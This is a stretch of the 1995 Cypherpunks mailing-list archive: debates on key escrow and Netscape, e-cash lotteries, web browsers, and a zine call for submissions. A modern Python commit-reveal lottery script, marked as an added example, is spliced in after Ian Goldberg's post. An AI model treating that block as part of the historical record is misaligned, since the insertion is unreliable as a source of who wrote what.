>use an approach like threatening to audit me every year, threatening
>my family, etc.)

In fact, most forms of recording need willing participation by at least one
party. Wiretaps are the main method of recording information which doesn't
involve willing participation of one of those communicating. Since there
are no laws regarding participation of service providers assisting the
government at gathering information, there is a great deal of leeway
legally.

If they actually pass a law (as in Penn) regarding ISP obligations it'll
probably be fought a bit, but does then put more stress on the situation.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 2 Dec 1995 11:33:23 +0800
To: cypherpunks@toad.com
Subject: key escrow compromise
Message-ID: <199511302339.PAA01778@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


to most on the list, the subject of this message would be an oxymoron.
("there is no compromise!")

regarding the recent Netscape brouhaha:

I tend to agree with Clark in only one regard: the government is going
to get into the key storage/retrieval business in some form or another
eventually & inevitably; it's just not stoppable. like one of the NSA 
spooks said after the Clipper fiasco, "well, we had to try". the aspect
that is up for grabs is whether these systems will be *mandatory* for
all private communication.

here's a quick idea. the post office is getting into 
certification authorization come hell or high water (ETA summer, 96). 
now, frankly I think this is a good thing. someday we will need some kind 
of legal agency to deal with citizen keys, so that we could have
cryptographic dealings with federal agencies such as the motor
vehicles department, etc. 

many are going to blast me to oblivion
for saying this, though. but don't you think there are some benign
government services that you would like to have access to via
your "state" or "legal identity" key? this would prevent other
people from faking your identity in front of the state, e.g. voter fraud,
and other miscellaneous things.

it seems to me the problem is when a government begins to insist
that the only authorized encryption you can use must be based on the
secret key they give you is where all the problems arise.

so, what we could advocate as a compromise (given that the post office
is absolutely not going to *not* get in this business, from what I can
tell). we encourage the idea of 

KEY FREEDOM

this would be a heading for the idea that we are in support of the (our)
government creating cryptographic infrastructures and key authentication
services, as long as we always have the total freedom to encrypt 
according to however we please in private communications.

in other words, we are willing to have an official state identity/key as
long as it is not required in our private transactions, only those involving
the state. (yes of course I know "state" is a pornographic word here, heh).
if you don't like this imagine it as a "stopgap measure" on the way toward
full cryptoanarchic infocalypse that government bureaucrats might buy.

another idea is that we might reasonably support a system that has
such a thing as "key escrow" but we only use the keys they give us
as part of our signatures to other people if we want to reveal our
"official" state identity, not to encode the communication itself.
in this way someone else could verify your identity for e.g. legal/
contractual purposes, but the overall communication would remain private.

in other words, we agree that the government does have the authority
to link people to their "official numbers", but we have a choice about
when to use those official numbers in any private communication, and
by law businesses do not ever have to *require* authentication in this way. 
the numbers of course would be required in communication between the individual
and government.

the situation is that the government *now* requires that it knows who
we are when we communicate with it in any official context. therefore
I submit that the above system would not take away any rights, and in
fact might lead to privacy advocates being able to use a massive government
key-infrastructure but still retain communication privacy.  in other words,
you now have the government actually supporting your cryptographic 
freedom by giving you a massive "official" key distribution system you can 
use any way you like.

another possible compromise is that by default, keys would be insecure,
in the sense the government stores them for "key escrow" purposes,
but people are always recognized as having the right as "tunneled 
encryption" (a great term for private encryption within the state encryption).

you see, cypherpunks often recognize that most of the world is so clueless
that they don't protect themselves, and they almost don't deserve to have
privacy by the default if they are entirely clueless or apathetic about
obtaining. so what we might be able to accomplish is a system in which all
the clueless people use the government-supplied keys, the FBI cracks some
percentage of "clueless" criminal communication, and non-clueless people
go ahead and bypass it all.

now, before you hotly flame my eyebrows off,
I say these things not because I like key escrow, but that I suspect
the post office is going to move into certification no matter what, and
the idea of key escrow is closely related to that. with a little finetuning
the cypherpunk position could help define the actual rights of individuals
relative to these new government systems in a way that is totally 
compatible with all our core privacy beliefs.


what I am getting at is that we could twist the words "key escrow"
to mean that the government provides some infrastructure for storing
& accessing public keys (similar to phone books), and we could 
simultaneously vehemently deny that "key escrow" legitimately allows 
the government to actually *have* our secret keys.

in other words, we say, "yes we support key escrow. of course it is
a good idea to let the government have simple phonebooks of keys. oh,
wait, you mean we have to USE THESE KEYS? in the official STATE
ENCRYPTION ALGORITHM? we have to STAMP OUR SSN# ON EVERY TRANSACTION
WITH EVERY BUSINESS? sorry buster, what I do with
my key is my private matter. this would be akin to having official
government phones that allowed the government to call any number
and start surveilling the room the phone is in."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 08:39:10 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <199511302342.PAA12808@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Robert Hettinga wrote:

> God help us all.
> 
> I've been invited to the CyberDog Coding Retreat next week at Apple
> Computer in Cupertino. Getting flown out there is cool. Hanging with the
> more clueful Mac Internet types and getting to kibbitz and watch (I like to
> watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
> subsisting on Dew and Pizza is really way cool. Even getting some
> mac.cypherpunks in the door to code crypto parts is extremely cool. But...

Mountain Dew and Pizza??  Ohh, waita minutae ... this is California.

That means it's probably smoked salmon, with avocado and mayonnaise
pizza.  Yum.  Seriously though ... I'm green with envy.  

I'd love to attend something like this, but logistics would be a
nightmare.  First, I'd have to get clearance from the US government
for that.  And I think I'm on their "undesirable" list, and would need
to get some type of waiver to clear immigration.  Problems, eh??

I tried to call the Consul-General this afternoon, actually to inquire
about that and got put on perpetual hold and forced to listen to some
long recording.  Then I was told that if I wanted any information at
all, I should call a 1-900 number.

A 1-900 number??  Too rich for my blood.

I guess that Foggy Bottom, really is worried about their budget
issues, aren't they?  I guess they really want me to use my quarter
for pretty much everything.

> They've asked me to give a "talk". All by myself. In an auditorium. With an
> audience, I mean. With publicity. I feel like Hoffman in Rain Man...
> V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
> here...

Oh, I hate large groups, unless I have prepared text.

> Sooo. I've been told I can have friends in the audience. That's cool. As
> many friends as I want. That's even cooler. I can even have reinforcements
> up on the rostrum. That's extremely cool.

Cool.  About reinforcements on the rostrum.  

I know, I really wouldn't inspire any confidence in the audience, at all. 
I'd probably go off into some strange side track on the nuances of
something completely irrelevant and lose the entire audience while
talking.  I'm really one of those people that doesn't always have facts,
and figures, and symbols readily at hand.  It's a cognitive thing. 

Sort of like a database inquiry.

Alternatively, if I do focus on an issue.  YIKES!!  My Aunt Danielle
always warned me about my tendency to use nuclear weapons when simple
artillery would suffice.  I tend to come on a "bit" heavy at times, unless
I actively self-censor.  It really is a constant battle on that front. 

> So, while I work on the "reinforcements up on the rostrum" part, *please*
> come and help me explain this stuff to the rest of the Apple community.

I'm really not sure I'd necessarily want to break "bad news" to
people, reinforcements or not.  I saw this yesterday, at a
presentation that I was at.  It was horrible, and I wasn't even
presenting.  I was in the audience -- an invited guest.  

I sorta kinda pissed on someone's campfire, and after that no-one
wanted to talk to me.  Shoot if looks could kill ...

I'd be worried about reputations and popularity, and what this all
means "long-term", beyond the time-line of the presentation.

I know that explaining some of this might severely limit future
opportunities.  I think I read that somewhere recently ... that
"consultants with blood on their hatchets" usually don't get very far. 

But it's your talk, I guess.  Just my $.02.

> Cryptoanarchy. Right here in Cupertino, folks.
> 
> See you there...



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:10:39 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape, Corporations, and GAK Support
Message-ID: <ace3709501021004c775@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 PM 11/30/95, Timothy C. May wrote:

>To secure Net communications, the government will need to have access to
>private data exchanges
>                                  ^^^^^^^^^^
>^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Sorry about the misaligned text and emphasis marks--it looked OK when I was
composing the message, but some hidden characters must've been present when
I cut-and-pasted the Clark text.

I think you all get the gist, though.

--Tim


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 1 Dec 1995 06:13:29 +0800
To: cypherpunks@toad.com
Subject: Re: ecash lottery (Was: ecash casino)
In-Reply-To: <199511300621.WAA26406@netcom14.netcom.com>
Message-ID: <49l62m$4dl@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511300621.WAA26406@netcom14.netcom.com>,
Bill Frantz <frantz@netcom.com> wrote:
>At 20:38 11/29/95 -0800, Timothy C. May wrote:
>>Have to be _very_ careful here. A variety of scams can be developed which
>>show lots of "small" winners, but which fail to show any large winners. The
>>lottery operators can make a lot of extra bucks by simply not paying off
>>the large winnings, in various ways.
>
>With complete anonymity, the scam I would think of first is giving other
>nyms of myself all the big payoffs.
>
But with complete anonymity, no player knows who else is playing, let
alone who won.  So if you were going to pay off yourself, you may as well
just pay off no one.

The idea behind my proposal was that any participant can determine if he has
won.  The winning number (a hash of which was published beforehand, as in
a "bit commitment" scheme) is announced.  Anyone who picked a number
that, say, matched in the last digit, wins $2.  If you matched the
last two digits, you win $10, etc.  The house (without sacrificing
reputation) can't arrange who the big payoffs will go to, nor can it
(as I think Tim suggested) give out lots of small prizes and no big ones.

   - Ian
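
The commit-then-reveal check described in the message above, as an added example that is not part of the original post. The six-digit ticket length, the random nonce mixed into the hash, and the prize tiers above $10 are assumptions; the last function shows why the nonce is needed when the number space is small.

```python
import hashlib
import secrets

DIGITS = 6        # assumed ticket length; the post does not give one
NONCE_LEN = 32    # assumed: fixed-length random nonce mixed into the commitment
# Prize in dollars by count of matching trailing digits. The $2 and $10 tiers
# are from the post; the higher tiers are constructed to stand in for its "etc."
PRIZES = {1: 2, 2: 10, 3: 100, 4: 1_000, 5: 10_000, 6: 100_000}


def _valid_number(s: str) -> bool:
    """True for a string of exactly DIGITS ASCII digits."""
    return len(s) == DIGITS and s.isascii() and s.isdigit()


def commit(winning: str, nonce: bytes) -> str:
    """Commitment the house publishes before any ticket is sold.

    The nonce has a fixed length, so nonce || number parses only one way.
    """
    if not _valid_number(winning) or len(nonce) != NONCE_LEN:
        raise ValueError("malformed winning number or nonce")
    return hashlib.sha256(nonce + winning.encode("ascii")).hexdigest()


def house_draw():
    """House side: pick the winning number and nonce, return them with the commitment."""
    winning = f"{secrets.randbelow(10 ** DIGITS):0{DIGITS}d}"
    nonce = secrets.token_bytes(NONCE_LEN)
    return winning, nonce, commit(winning, nonce)


def verify_opening(commitment: str, winning: str, nonce: bytes) -> bool:
    """Player side: does the announced (number, nonce) open the published commitment?"""
    try:
        expected = commit(winning, nonce)
    except ValueError:
        return False
    return expected == commitment.lower()


def trailing_match(ticket: str, winning: str) -> int:
    """Number of digits that agree, counted from the last digit backwards."""
    n = 0
    for a, b in zip(reversed(ticket), reversed(winning)):
        if a != b:
            break
        n += 1
    return n


def payout(ticket: str, commitment: str, winning: str, nonce: bytes) -> int:
    """Prize any participant can compute alone once the house reveals.

    Refuses to pay out against an opening that does not match the commitment,
    which is what stops the house choosing the number after seeing the tickets.
    """
    if not _valid_number(ticket):
        raise ValueError("malformed ticket")
    if not verify_opening(commitment, winning, nonce):
        raise ValueError("announced number does not open the published commitment")
    return PRIZES.get(trailing_match(ticket, winning), 0)


def bare_hash(winning: str) -> str:
    """Commitment WITHOUT a nonce, shown only for comparison."""
    return hashlib.sha256(winning.encode("ascii")).hexdigest()


def recover_from_bare_hash(digest: str):
    """With only 10**DIGITS candidates, a bare hash hides nothing:
    anyone can enumerate the space before buying a ticket."""
    for n in range(10 ** DIGITS):
        guess = f"{n:0{DIGITS}d}"
        if bare_hash(guess) == digest:
            return guess
    return None


if __name__ == "__main__":
    winning, nonce, published = house_draw()
    print("published before sales:", published)
    print("revealed after sales:  ", winning, nonce.hex())
    ticket = "0000" + winning[-2:]          # constructed ticket sharing two digits
    print("ticket", ticket, "wins $", payout(ticket, published, winning, nonce))
```
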




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 07:24:18 +0800
To: cypherpunks@toad.com
Subject: CyberDog?
Message-ID: <ace371a202021004069a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:16 PM 11/30/95, Vinnie Moscaritolo wrote:

>You know, one possible solution lies in the direction of Apple's CyberDog.
>It is based on OpenDoc and should be portable to windoze, I hate to say Rah
>told you so but...
>
>Even with all the ITAR silliness, even if on the contingency that Apple
>can't provide a SSL or whatever in their HTML part, YOU can always write
>your own HTML part, (it's just not that complicated) in the Cyberdog
>environment and override the Apple CyberDog HTML part.
>
>This looks like a great opportunity for some Cypherpunks to write code, and
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>code that people DO care about.. a CypherPunk CyberDog part to replace the
>Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Go for it, Vinnie! Let us know how it works out. Being at Apple, I presume,
you're in a position to do what you suggest.

The problem of course is that many, many pieces of code "need" to be
written: several projects mentioned on this list frequently could use more
coders. Integrating the casual work of volunteers is usually hard to do.

If the idea is really a good one, and will result in an interesting
product, then probably the best approach is for someone to do more than
just volunteer some free time: he should set out to build a product he can
sell or at least get some recognition for. (A la Eudora, Stuffit, Red
Ryder, etc.)

I'm a Mac user, but am taking a wait-and-see approach to this "CyberDog"
(dumb name!) thing. If it works out, great. But until OpenDoc (and the
alphabet soup of object standards like Ole, Bento, DOE, SOM, etc.) appears
in real products and demonstrates usefulness, I don't see a rush of folks
moving from Windows and Unix platforms to the Mac to develop it.

If CyberDog is really a decent Web browser--and I've heard some good things
about it, admittedly from Macintosh partisans--then many of us will
probably use it.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 1 Dec 1995 07:06:02 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02110100ace3a9062ab4@[17.203.21.75]>
Message-ID: <Pine.SUN.3.91.951130162044.14431A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, Vinnie Moscaritolo wrote:

> Even with all the ITAR silliness, even if on the contingency that Apple
> can't provide a SSL or whatever in their HTML part, YOU can always write
> your own HTML part, (it's just not that complicated) in the Cyberdog
> environment and override the Apple CyberDog HTML part.
> 
> This looks like a great opportunity for some Cypherpunks to write code, and
> code that people DO care about.. a CypherPunk CyberDog part to replace the
> Apple HTML viewer with one that has hooks for an encryption API (GSSAPI?)

Well if we gonna go that way just use HotJava and create your own 
protocol and content handlers. They are d/l dynamically. Just as an example.
Write a pop3 protocol handlers, they use the URL 
pop3://mail.host.com/loginname to get your mail. Oh what's that? Someone
sent you a application/pgp message well guess they pgp content handler will
have to take care of that.

It's really a shame that Sun hasn't released HotJava with the JDK it could
give netscape a sun for its money.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Fri, 1 Dec 1995 00:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: e-cash gambling
Message-ID: <199511301536.QAA25670@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sameer, Ian, and then Tim wrote:

<many different snips throughout>

>>	Any enterprising cypherpunks in gambling-friendly
>>jurisdictions interested? I figure it would make ecash take off.. and
>>you'd get rich.
>>
>Does anyone know what jurisdictions allow lotteries/gambling?
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment.  It should not
>be interpreted as condoning or encouraging anyone to break any
>laws, no matter how stupid the laws are.]
>

>Personally, I have long had great _hopes_ for using crypto for
>non-sanctioned gambling, but I'm pretty skeptical that many people will do
>it. For one thing, anyone knowledgeable enough to be comfortable with the
>cryptography knows that gambling when a house cut exists is a lose. (And
>gambling with no house cut is, at best, a wash.)

And then Allen wrote:

>How about gambling on something other than random numbers? Idea Futures
>are one instance, as is sports gambling for those interested in that sort of
>thing.

[I am posting anonymously, but about a half-dozen of you will know who
I am. Please keep it confidential. I have posted (anonymously) a while
back on this subject, and I am aware of the lame, hard to use college
site which does something similar to what I will again suggest.]

I would like to see e-cash gambling on US Presidential elections/primaries
[as is currently done in London & Moscow]. There was an interesting W$J
article that pointed out how the odds in these gambling houses track the
results of elections more accurately (from thousands of miles away) than
Gallup & Roper ever have, (and without calling me at suppertime)<g>. The
W$J article appeared right after Clinton's victory over Bush. A web-page
in London giving the odds in easy-to-read form would be nice, and might
quickly lead to demand for actual gambling from "this side of the pond."
This could be accomplished through anonymous remailers & strong crypto.
It would accomplish the cypherpunk goals of setting important information
free through use of our technology, it would encourage gamblers to learn
about strong crypto, and it would use crypto for something besides child
porn or drugs, which will be good PR for us. There will, of course, be
lame arguments about this "demeaning the integrity of the process," but
I think Letterman and Leno could be trusted to handle them without our
help. ;)

<obalice(s) -- please, make it stop!>

<obNutscrape & clipper II "cold, dead neurons.">






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 08:10:50 +0800
To: cypherpunks@toad.com
Subject: Netscape's Delicate Balancing Act
Message-ID: <ace375f6030210040b22@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The market valuation of Netscape Communications is not specifically a
Cypherpunks topic, though many of us are interested in it, and/or use Netscape.

But there are some issues about Netscape's future product plans which may
affect market valuation, and which also could hinge on PR issues like Jim
Clark's apparent support for mandatory key escrow.

To wit, Netscape is currently valued at $5 billion or so, despite having
essentially no revenues or profits (sure, it has a little of each, but not
much). This is more than the market capitalization of many sizable,
respected companies. Companies like General Dynamics, Apple Computer, CBS
(which was just sold to Westinghouse for $5B). Granted, Netscape investors
are betting on the come. (And contrary to what someone said, investors in
companies like Netscape are not mostly interested in profits. Rather, they
are interested in selling at a higher price, for whatever reason. This is
also known as the "greater fool" theory: that no matter how high the price
of a stock, there is some greater fool who will buy it at a higher price. Of
course, the corollary to the greater fool theory is that there is usually a
greatest fool.)

So, can Netscape keep a $5 billion valuation? (And more to the point, can
it double from where it is now, say, and sustain a $10 B valuation? I am
skeptical, personally, but I've been wrong before.)

What Netscape has to offer is based on a *public* standard, the Web and all
the various pieces that so many companies are supporting. Netscape's
_server_ market--which is said to be where the revenues are mostly coming
from--is likely to face heavy competition. As is the browser, of course.
(Spyglass Mosaic, Ravi's company, HotJava, CyberDog, MacWeb, and a bunch of
others).

Scenario #1: Netscape sticks to an open standard. Hard to see what keeps
the valuation at $5 B with so many free browsers, free servers, low-cost
servers, etc.

(From the browsing side, "brand loyalty" is probably minimal: I've used
several browsers, and currently use Netscape 1.1N for _some_ of my Web
needs. I'll switch "on a dime" to another browser if it offers features I
like. Others I have talked to feel the same way. I think "loyalty" to a
particular browser is close to nil. Much less than loyalty to a text
editor, for example.)

Scenario #2: Realizing this, Netscape seeks to "differentiate itself" by
proprietary technology.

"'Nuff said."

I can't see any means of "proprieterizing" the Web that Netscape could hang
on to. Any good ideas will be quickly copied or reverse-engineered by other
companies and groups.

Unlike a chip company, with various and complicated secrets tied up in
internal chip design data bases and in billion-dollar fabrication plants,
what could a browser or server really keep secret? Unlike a company like
Adobe, with various programs whose functionality can mostly be protected
from copying by use of copyright laws, a Web browser that operates on
public standard files in standard ways will be hard to protect.
(Ironically, Netscape's valuation is significantly higher than Adobe's, and
Adobe had something like $700 million in yearly sales and $100+ million in
profits.)

So, it is my thesis that "brand loyalty" to Netscape is ephemeral, that
users will flock to the Next Whizzy Thing faster than you can say "price
collapse."

The connection with crypto and key escrow is that any bad publicity, any
hint that Netscape is signing-on to be an agent for Big Brother, could
hasten this conversion.

While I would never, ever suggest to anyone that the sticker idea I devised
a few years ago--"Big Brother Inside"--be applied here, I can imagine
others will.

Netscape is in a very delicate balancing act. Jim Clark may turn out to be
the Karl Wallenda of the Web (with no Net to catch him).

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 1 Dec 1995 09:37:53 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Netscape's Delicate Balancing Act
In-Reply-To: <ace375f6030210040b22@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.951130165549.1889D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



If anyone is interested, I'm planning to make up some T-Shirts featuring 
"The South Bay Url Company". 

Simon // Yes, we also do Tulips

---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "BlackHeart" <DR940788@caper1.uccb.ns.ca>
Date: Fri, 1 Dec 1995 06:03:45 +0800
To: cypherpunks@toad.com
Subject: query...
Message-ID: <199511301707073141.DR940788@caper1.uccb.ns.ca>
MIME-Version: 1.0
Content-Type: text/plain


Reply to: DR940788@caper1.uccb.ns.ca

   I am currently putting together an e-zine covering computer security
issues, non-mainstream music, and basically anything else people want to
write about.  This is an open query for submissions of any kind. Here are
good examples of what I will consider putting into the zine :

---------
Good chance of getting in:
a. interviews, quotes, etc. from "net personalities", writers, band
members, people with interesting computer-related jobs/hobbies/etc.
b. people involved in the field of computer security on either side of the
wall, hackers, phreaks, system admins, police, etc. and their tales
c. reviews of independent, or non-mainstream software, movies, music, etc.
d. any kind of new digital tech. that is interesting and unique, a
description and review
e. basically anything else that is related to the information age, digital,
cyber (even though i hate the word), 'net related, etc.

---------
NO chance of getting in:
a. political views/essays which are not a concern of the computer and/or
net community
b. fiction of ANY sort (sci-fi, cyberpunk, etc, etc.)
c. anything else not related to alternative or "tech" field (ex - reviews
of mainstream albums, movies, etc., also articles on things such as the
environment and gay rights will be turned away, simply because this is not
what the magazine is aiming for)

---------
If you have an album, tape, CD, software, device, etc. you want reviewed,
send it along to :

Terminal Obsession
P.O. Box 831
Sydney, Nova Scotia
CANADA
B1P 6T7


If you are interested in subscribing to the completed 'zine, wait until
you see an announcement, as the zine is not complete as of yet, and may
not be for a short while, so i have nothing to send you yet!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KJC@cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 02:10:16 +0800
To: cypherpunks@toad.com
Subject: Re: [Rant!] Death by praise Re: Netscape gives in to key escrow
Message-ID: <199511301736.RAA29417@ns.cityscape.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>
>
>On Thu, 30 Nov 1995, Jay Holovacs wrote:
>
>> On Thu, 30 Nov 1995, Timothy C. May wrote:
>> > Can Netscape continue to prosper? This latest issue won't kill it,
>> 
>> I suspect this will unfortunately help. Stockholders are interested in 
>> profits, not principles. Co-oping with the feds will help Netscape get to 
>> the commercial market sooner, and most customers, sadly don't give a damn 
>> about privacy (or don't understand).
>
><Rant mode on>
>Clipper and family are vampires; shine some light on them and they're dead.
>Witness the public ridicule of the FBI 1% scheme. Compare that to the near
>mainstream silence about DT. The last round of Clipper was wonderful, for 
>a while in '94 we had Time sounding like Brock Meeks.
>
>If Jim Clark really does mean this nonsense then I hope he does a Dorothy 
>Denning and takes his show on the road (sorry Jeff). This is simply 
>easy fodder for journalists without a story, totally black and white 
>cheap shot at the gov. While people don't give a damn about their privacy, 
>they sure do get mad when they're shown how easy it is to take away. 
>They *hate* hearing the $ cost.
>
>Maybe some of the people on this list with higher profiles than myself should
>start defending Clipper and GAK as loudly and stupidly as possible. I've 
>grown dead tired of trying to get anyone around me interested in pgp,
>remailers and whatnot. Reverse psycho sounds a lot easier:
>
>"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live 
>last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion 
>dollar investment in your national security. Only through complete wiretapping 
>will we save our nation's children from violent cigarette smokers, tax 
>cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation 
>of Islam Dope Pushers, audiophiles, christians, fat people, OJ and 
>jaywalkers on the infohighway." -USA Today" 
>
>(Apologies. You may now killfile me with a clear conscience.)
>
>If you can't beat 'em, subvert 'em.
>
>
>
As a _very_ low profile member of this list I thought a futile gesture
was needed at this point:
                        *I agree with you*
I've been trying to interest the BBC in the U.K. in pgp, clipper et al 
for ages - I give up! - BTW - after 'Britland' MPs posted here a while back
I thought _maybe_ we'd hear more. Will the last one to leave Grate Britain
please switch out the lights!
kc

------------------------------------------------------     
Fingerprint:OF 3B IE 6A 8D 14 EC 9B 75 9B FB A2 E8 35 FE            
Finger: .plan + public key -> af91@ftp.cityscape.co.uk
http://www.gold.net/users/af91/kjc.htm
"...and now...five in a row by Whitney Houston"

------------------------------------------------------

   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Fri, 1 Dec 1995 10:18:05 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <ace40d4e0a021004aa99@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


If he has not clarified his position by tomorrow evening, I will set up some
web pages explaining the situation and decrying Netscape's apparent
position on key escrow (GAK). I have the quotes that L. McCarthy posted,
and Jeff Weinstein's response. I have not been able to get the article off
the server yet (possibly all the cypherpunks downloading it?). Any other
documents I should include?

        -Lance

At 1:24 PM 11/30/95, Jim Gillogly wrote:
>> Raph Levien <raph@c2.org> writes:
>> I called Netscape public relations. Here's what I found out:
>
>> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
>> 2. You can order a tape of the speech from Conference Copy for...
>
>Good initiative, but we needn't wait for 6 weeks to get a copy of it.
>All that needs to happen is for Jim Clark to explain what he meant, if
>it's different from what was reported.  No need for all the to-ing and
>fro-ing.
>
>Perhaps what he meant was simply reiterating the announcement of October
>when they said they'd support the TESSERA crypto API.  If it's worse than
>this, he should explain what's going on.  If not, October was the time to
>get excited rather than now.
>
>Waiting with bated breath...
>
>        Jim Gillogly
>        Highday, 10 Foreyule S.R. 1995, 21:24

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 02:46:01 +0800
To: "P. Rajaram" <rajaram@morgan.com>
Subject: Re: The future will be easy to use
In-Reply-To: <9511300751.ZM7630@morgan.com>
Message-ID: <Pine.BSD.3.91.951130174443.7762B-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, P. Rajaram wrote:

> On Nov 29, 10:25pm, attila wrote:
> > Subject: Re: The future will be easy to use
> >    OK, I have not seen it (like I said, I will get it) or read ipsec.
> >
> >    However, despite the group ego, Sun _does_ listen and Sun does wish to
> > be the leader. If the rest of ipsec group has a specific list, maybe it
> > needs to be presented higher up the pole.
> 
> There are different groups within Sun.
> The people pushing SKIP don't talk much with the group building IPv6.
>
   that's a given. NIBM (not invented by ME) syndrome.  That is what 
needs to stop. however, Sun has been playing the game recently of 
introducing an early product, then coming on with a more standard product.

   that does not change the fact the two groups need to talk, and someone 
needs to coordinate resources.  Nothing wrong if SKIP shakes out a few 
details as they implement, but then it needs to go to the standards.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 1 Dec 1995 03:21:10 +0800
Subject: SUN, UNIX, et al versus MS standards
In-Reply-To: <199511301517.JAA14087@spirit.sctc.com>
Message-ID: <Pine.BSD.3.91.951130175032.7762C-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    my only comment on Sun's non-portable software is that it
**used-to-be** a case of excessive Berzerkely attitude. Solaris is an
effort, and a very credible effort to meet industry and consumer
standards.  The code is compatible to Sys V R4, and on x86 implementations
